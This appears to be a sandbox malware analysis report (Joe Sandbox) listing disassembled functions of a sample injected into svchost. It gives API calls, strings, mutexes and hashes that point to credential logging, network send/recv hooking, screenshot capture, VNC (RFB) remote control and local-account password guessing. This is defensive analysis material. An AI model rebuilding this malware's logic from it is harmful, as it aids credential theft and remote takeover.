                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7972b1d942e5c31f1ab25a471a792741f0cbfed0ee84b78b5b9b20dcb130159
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2C717F71D40309AFDB20CFA8D884BAEBBF5FB48704B58866DE606E7244D770A905CF90
                                                                                                                                                                                                                Function 02BCE1B0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 167stringthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BCE1D1
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(00000000,<L>,?,00000000,?), ref: 02BCE209
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCE23D
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D73AC), ref: 02BCE273
                                                                                                                                                                                                                • PathFileExistsA.SHLWAPI(00000000), ref: 02BCE2B9
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BCB980,00000000,00000000,00000000), ref: 02BCE338
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCE350
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCE361
                                                                                                                                                                                                                • strstr.MSVCRT ref: 02BCE387
                                                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?), ref: 02BCE3C4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Path$BackslashHandle$CloseCreateExistsFileInformationThreadmemcpymemsetstrstr
                                                                                                                                                                                                                • String ID: 617D73AC$<L>$POST$bsi.dll$pass.log
                                                                                                                                                                                                                • API String ID: 4177962767-2777904747
                                                                                                                                                                                                                • Opcode ID: 54637b4078334f586aa29beb8dae7888868d86550de0a4534d0e707bcc3c91da
                                                                                                                                                                                                                • Instruction ID: 46df604d2f633d9e092139db962f8a8c0f9caf5889cf91ce54daf9e584c0ba98
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 54637b4078334f586aa29beb8dae7888868d86550de0a4534d0e707bcc3c91da
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45512E31D40309DBD7229F34E848BDA7BA5FF88704F2586D9EA4597280DBB0EA54CBD0
                                                                                                                                                                                                                Function 02BD3340 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 106sleepCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(02C0CF94), ref: 02BD3367
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD33A9
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD33B5
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD33B9
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD33CA
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD33D1
                                                                                                                                                                                                                • CreateDirectoryA.KERNEL32(?,00000000), ref: 02BD3402
                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 02BD3408
                                                                                                                                                                                                                • IsUserAnAdmin.SHELL32 ref: 02BD340C
                                                                                                                                                                                                                • PathMakeSystemFolderA.SHLWAPI(?), ref: 02BD341D
                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000), ref: 02BD3424
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 02BD3452
                                                                                                                                                                                                                • Sleep.KERNEL32(00000FA0,?), ref: 02BD3468
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ErrorLast$Path$AdminCreateDirectoryFolderMakeSystemUser$BackslashSleep_snprintf
                                                                                                                                                                                                                • String ID: %s\%02d.bmp$scrs
                                                                                                                                                                                                                • API String ID: 224938940-1670482240
                                                                                                                                                                                                                • Opcode ID: 8e14f35cd3d53e9fd4ee45f4995e1f6959d0c3f881704dc7296454a9a5980491
                                                                                                                                                                                                                • Instruction ID: b5a1ed7bc9656a71c23918afc14a0d9986feb95407b449470bb09fea83ea2b8d
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8e14f35cd3d53e9fd4ee45f4995e1f6959d0c3f881704dc7296454a9a5980491
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0E314C319442185BCB60DB789C58BEABBE8EF55750F8884D4EAC5D3101EFB0E984CFA1
                                                                                                                                                                                                                Function 02BD31D8 Relevance: 26.3, APIs: 11, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}), ref: 02BD31EC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD31FD
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD3211
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD321F
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD3080,00000000,00000000,00000000), ref: 02BD3234
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40), ref: 02BD3245
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD324A
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD325E
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD326C
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617D7752), ref: 02BD3277
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617D7752,RFK), ref: 02BD3291
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD329A
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$Sleep$CloseInformationMutex$BackslashCreateObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 617D7752$Local\{EAF777BF-8989-4fe1-9A0D-95CD777C0214}$P0Wu$RFK
                                                                                                                                                                                                                • API String ID: 505831200-465362393
                                                                                                                                                                                                                • Opcode ID: b332bc7398d7e59a256677b9d9e81de3c775f3492c352e7e465d2a936134b652
                                                                                                                                                                                                                • Instruction ID: 7b7cde57d9647831640f838d481e6a93ababbdf98e7367950562e66d2c83ad52
                                                                                                                                                                                                                • Opcode Fuzzy Hash: b332bc7398d7e59a256677b9d9e81de3c775f3492c352e7e465d2a936134b652
                                                                                                                                                                                                                • Instruction Fuzzy Hash: B6110430AC67527BF2705B648C0AF8E77D4AF04B55F508688FB95A21C1EBF094058FA7
                                                                                                                                                                                                                Function 02BBA250 Relevance: 25.9, APIs: 17, Instructions: 354windowthreadtimeCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetAncestor.USER32(00000000,00000002,00000080,?,00000000), ref: 02BBA25E
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindowLongA.USER32(02BBCE3A,000000F0), ref: 02BBE26B
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetLastActivePopup.USER32(02BBCE3A), ref: 02BBE279
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000005), ref: 02BBE293
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindow.USER32(00000000), ref: 02BBE296
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindowInfo.USER32(00000000,?), ref: 02BBE2AC
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000004), ref: 02BBE2B5
                                                                                                                                                                                                                  • Part of subcall function 02BBE250: GetWindow.USER32(00000000,00000003), ref: 02BBE2EE
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000010,00000000,00000000), ref: 02BBA29F
                                                                                                                                                                                                                • GetAncestor.USER32(00000000,00000002,00000000), ref: 02BBA325
                                                                                                                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000021,00000000,00000001,00000002,00000064,?), ref: 02BBA34C
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000020,00000000,00000001), ref: 02BBA391
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000001), ref: 02BBA3E5
                                                                                                                                                                                                                  • Part of subcall function 02BBA100: GetTickCount.KERNEL32 ref: 02BBA18A
                                                                                                                                                                                                                  • Part of subcall function 02BBA100: GetClassLongA.USER32(00000000,000000E6), ref: 02BBA1DD
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000112,?,?), ref: 02BBA44E
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,0000007B,00000000,?), ref: 02BBA479
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,0000007B,00000000,00000000), ref: 02BBA4F5
                                                                                                                                                                                                                • GetSystemMenu.USER32(00000000,00000000), ref: 02BBA514
                                                                                                                                                                                                                • GetMenuItemInfoA.USER32(00000000,0000F060,00000000,0000004C), ref: 02BBA538
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBA5A3
                                                                                                                                                                                                                • PostMessageA.USER32(00000000,00000000,00000000,00000000), ref: 02BBA5B6
                                                                                                                                                                                                                • PostMessageA.USER32(?,?,00000001,00000000), ref: 02BBA5D9
                                                                                                                                                                                                                • PostMessageA.USER32(?,?,00000002,00000000), ref: 02BBA5FB
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 02BBA633
                                                                                                                                                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 02BBA65D
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Message$Window$Post$ProcessThread$AncestorInfoLongMenuSend$ActiveClassCountItemLastPopupSystemTickTimeout
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 590198697-0
                                                                                                                                                                                                                • Opcode ID: 20163c82ee87b3616ec0b07b6ff4c7b2443b711e2914e3ca6afad8d611f0f787
                                                                                                                                                                                                                • Instruction ID: 6356255b7b55eacdcf68ebfb71cbb12f324b9cd700084acb856463e00a31301a
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20163c82ee87b3616ec0b07b6ff4c7b2443b711e2914e3ca6afad8d611f0f787
                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2B17932F4021426EB329A18D889FFE7758DF81755F0840AAFE48E7182C7E9C861C7A1
                                                                                                                                                                                                                Function 00401EA0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 169threadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,00000000,7702DB30), ref: 00401EC6
                                                                                                                                                                                                                • NetQueryDisplayInformation.NETAPI32(00000000,00000001,00000000,000003E8,000000FF,?,?,?,00000000,7702DB30), ref: 00401EE2
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00401F28
                                                                                                                                                                                                                • NetUserGetInfo.NETAPI32(00000000,00000000,00000001,?), ref: 00401F39
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 00401F5A
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 00401F65
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 0040190B
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,75435430,00000000,?), ref: 00401923
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 0040194D
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401950
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 00401963
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                                  • Part of subcall function 004018E0: memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                                  • Part of subcall function 004018E0: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                                  • Part of subcall function 004018E0: CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00401FCA
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                                  • Part of subcall function 004018E0: GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                                  • Part of subcall function 004018E0: HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 0040200A
                                                                                                                                                                                                                • _snprintf.MSVCRT ref: 00402046
                                                                                                                                                                                                                • SwitchToThread.KERNEL32(?,?,00404D80,?,?,?), ref: 0040208F
                                                                                                                                                                                                                • NetApiBufferFree.NETAPI32(?), ref: 004020B5
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$Process$ByteCharFreeMultiWide$_snprintfmemset$AllocBufferValidate$CreateDisplayFileInfoInformationLogonModuleNameQuerySwitchThreadUserWith
                                                                                                                                                                                                                • String ID: %s1$%s12$%s123
                                                                                                                                                                                                                • API String ID: 1588441251-2882894844
                                                                                                                                                                                                                • Opcode ID: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                                • Instruction ID: f170fe93e02ccaf968bc2c6ae71e56240b4678089189b5983d08b015d4f9d182
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 97f59b3fbf87337b1cbc6ae598f2ad5bd0982248879de21f7b69a44719f2851e
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 735184B25143016BD331EB54C984FEB73E8ABD8754F404A2EF6846B1D0DB78DA44CBA6
                                                                                                                                                                                                                Function 02BB9020 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 132memorythreadwindowCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?,7556F590,755616B0,?), ref: 02BB902F
                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 02BB9037
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 02BB9048
                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 02BB9059
                                                                                                                                                                                                                • CreateCompatibleBitmap.GDI32(00000000,00000000,?), ref: 02BB9070
                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,?,00000000), ref: 02BB90B2
                                                                                                                                                                                                                • GetDIBits.GDI32(00000000,00000000,00000000,00000001,00000000,00000028,00000000), ref: 02BB90C2
                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 02BB90C5
                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 02BB90CE
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BB9129
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02BB9142
                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000008,?), ref: 02BB915F
                                                                                                                                                                                                                • SetThreadDesktop.USER32(?), ref: 02BB9194
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Heap$AllocBitsCapsDesktopDeviceThread$BitmapCompatibleCreateDeleteFreeObjectRelease
                                                                                                                                                                                                                • String ID: (
                                                                                                                                                                                                                • API String ID: 188880187-3887548279
                                                                                                                                                                                                                • Opcode ID: 82e4b6dae060cf417f81fcc2b31a3116b882f478e14696a1fb1a2337f630cee5
                                                                                                                                                                                                                • Instruction ID: 354fc3fd9d13f3d189becb481a452ea0169f03e41d30372ffc7b453bb87baad3
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82e4b6dae060cf417f81fcc2b31a3116b882f478e14696a1fb1a2337f630cee5
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D414F71E41314AFDB60CFA8D889FEA7BB8EB49750F544569E608EB381D7705810CFA4
                                                                                                                                                                                                                Function 02BC9820 Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 65libraryloaderCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(advapi32.dll,00000000,00000000,7556F550,7556DF10,02BC598B), ref: 02BC9831
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,CryptEncrypt), ref: 02BC9843
                                                                                                                                                                                                                  • Part of subcall function 02BCA540: VirtualAlloc.KERNEL32(00000000,-00000008,00003000,00000040,7556F550,00000000,76C0BD50,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA578
                                                                                                                                                                                                                  • Part of subcall function 02BCA540: memcpy.MSVCRT(?,?,00000000,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA5A0
                                                                                                                                                                                                                  • Part of subcall function 02BCA540: VirtualProtect.KERNEL32(00000000,?,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA635
                                                                                                                                                                                                                  • Part of subcall function 02BCA540: VirtualProtect.KERNEL32(?,00000000,00000040,02BC98DA,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA64A
                                                                                                                                                                                                                • LoadLibraryExA.KERNEL32(ws2_32.dll,00000000,00000000), ref: 02BC9862
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,send), ref: 02BC9870
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WSASend), ref: 02BC988C
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,WSARecv), ref: 02BC98A8
                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,recv), ref: 02BC98C4
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: AddressProc$Virtual$LibraryLoadProtect$Allocmemcpy
                                                                                                                                                                                                                • String ID: CryptEncrypt$WSARecv$WSASend$advapi32.dll$recv$send$ws2_32.dll
                                                                                                                                                                                                                • API String ID: 1216545827-2206184491
                                                                                                                                                                                                                • Opcode ID: fb0b1d228f9a03b660fd1cb2c8387043e08823716844a4df9e2989cf28e8c9c0
                                                                                                                                                                                                                • Instruction ID: 706086d7263a89eedce37d64d4fa08687f9015a9991ce9633dbe8181c86b88b7
                                                                                                                                                                                                                • Opcode Fuzzy Hash: fb0b1d228f9a03b660fd1cb2c8387043e08823716844a4df9e2989cf28e8c9c0
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E1012972BC5F1A71FA6036760D02F2B134C5B84F88F3505E87603B6095EA98E50945B8
                                                                                                                                                                                                                Function 02BD19A0 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 56sleepsynchronizationthreadCOMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • OpenMutexA.KERNEL32(00100000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD19CC
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD19D9
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD19ED
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD19FF
                                                                                                                                                                                                                • CreateThread.KERNEL32(00000000,00000000,02BD17D0,00000000,00000000,00000000), ref: 02BD1A10
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BD1A1F
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD1A26
                                                                                                                                                                                                                • PathAddBackslashA.SHLWAPI(617d7077), ref: 02BD1A2D
                                                                                                                                                                                                                • Sleep.KERNEL32(00009C40,617d7077,KBP), ref: 02BD1A47
                                                                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 02BD1A50
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Handle$CloseMutexSleep$BackslashCreateInformationObjectOpenPathReleaseSingleThreadWait
                                                                                                                                                                                                                • String ID: 617d7077$KBP$Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                                • API String ID: 4173420962-1284881761
                                                                                                                                                                                                                • Opcode ID: ac9b7bb9d85963349967b14a2cea727ab9f38ee3809c726c80f3b850fff72a6d
                                                                                                                                                                                                                • Instruction ID: 940a88cebf5f0d4d1007363fcfa309b82fa228f4fb357b7dc6c7f65ff04a96ea
                                                                                                                                                                                                                • Opcode Fuzzy Hash: ac9b7bb9d85963349967b14a2cea727ab9f38ee3809c726c80f3b850fff72a6d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: BE014934AD57127BF37067A84C4AF8E369C9F04B91F500250FB69771C0ABE0A90087BA
                                                                                                                                                                                                                Function 02BDC8D0 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 298COMMON
                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: malloc$inet_ntoa$closesocketfreegetpeernamesetsockopt
                                                                                                                                                                                                                • String ID: RFB 003.006
                                                                                                                                                                                                                • API String ID: 725816019-3790533501
